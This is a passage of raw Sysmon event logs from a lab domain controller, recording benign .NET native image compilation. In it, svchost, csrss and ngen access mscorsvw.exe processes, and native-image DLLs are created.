13:22:41.654{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45A1-6000-6902-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:41.638{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45A1-6000-6902-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:41.638{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45A1-6000-6902-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:41.513{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45A1-6000-6802-000000009A01}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:41.498{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45A1-6000-6802-000000009A01}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:41.498{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45A1-6000-6802-000000009A01}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:41.388{08A6967A-459F-6000-6702-000000009A01}2444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\98c-0\System.Data.Services.dll2021-01-14 13:22:41.388 10341000x80000000000000006552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:42.810{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45A2-6000-6A02-000000009A01}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:42.795{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45A2-6000-6A02-000000009A01}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:42.795{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45A2-6000-6A02-000000009A01}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:42.716{08A6967A-45A1-6000-6902-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c0c-0\System.Data.Services.Client.dll2021-01-14 13:22:42.716 10341000x80000000000000006562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:43.638{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45A3-6000-6D02-000000009A01}4288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:43.638{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45A3-6000-6D02-000000009A01}4288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:43.638{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45A3-6000-6D02-000000009A01}4288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:43.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45A3-6000-6C02-000000009A01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:43.560{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45A3-6000-6C02-000000009A01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:43.560{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45A3-6000-6C02-000000009A01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:43.498{08A6967A-45A3-6000-6B02-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\120c-0\System.Data.Services.Design.dll2021-01-14 13:22:43.498 10341000x80000000000000006555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:43.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45A3-6000-6B02-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:42.998{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45A3-6000-6B02-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:42.998{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45A3-6000-6B02-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:45.889{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45A5-6000-6F02-000000009A01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:45.889{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45A5-6000-6F02-000000009A01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:45.889{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45A5-6000-6F02-000000009A01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:45.748{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45A5-6000-6E02-000000009A01}4952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:45.748{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45A5-6000-6E02-000000009A01}4952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:45.748{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45A5-6000-6E02-000000009A01}4952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:45.623{08A6967A-45A3-6000-6D02-000000009A01}4288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10c0-0\System.Data.SqlXml.dll2021-01-14 13:22:45.623 11241100x80000000000000006570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:46.982{08A6967A-45A5-6000-6F02-000000009A01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1038-0\System.Deployment.dll2021-01-14 13:22:46.982 10341000x80000000000000006576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 